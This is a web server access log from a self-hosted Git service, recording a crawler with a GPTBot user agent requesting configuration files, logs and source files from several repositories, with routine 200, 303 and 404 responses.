"/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:15:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11720] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11721] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:33:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:33:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:33:26 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14901] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" -[17/Feb/2026:15:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14933] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" -[17/Feb/2026:15:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10856] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" -[17/Feb/2026:15:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12603] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" -[17/Feb/2026:15:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" -[17/Feb/2026:15:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" -[17/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" -[17/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12594] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" -[17/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10834] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" -[17/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14392] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:15:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" -[17/Feb/2026:15:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py?display=source" [Client 74.7.227.38] [Length 12962] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" -[17/Feb/2026:15:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:15:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16085] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" -[17/Feb/2026:15:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2?display=source" [Client 74.7.227.38] [Length 20239] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" -[17/Feb/2026:15:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" -[17/Feb/2026:15:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good?display=source" [Client 74.7.227.38] [Length 20260] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" -[17/Feb/2026:15:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:15:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:15:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:15:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11716] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:15:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11721] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11696] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:15:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11722] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10958] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:15:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:15:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" -[17/Feb/2026:15:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12759] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" -[17/Feb/2026:15:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 11830] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:33:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:33:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:33:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:33:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" -[17/Feb/2026:15:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/database.sqlite" -[17/Feb/2026:15:33:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:33:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 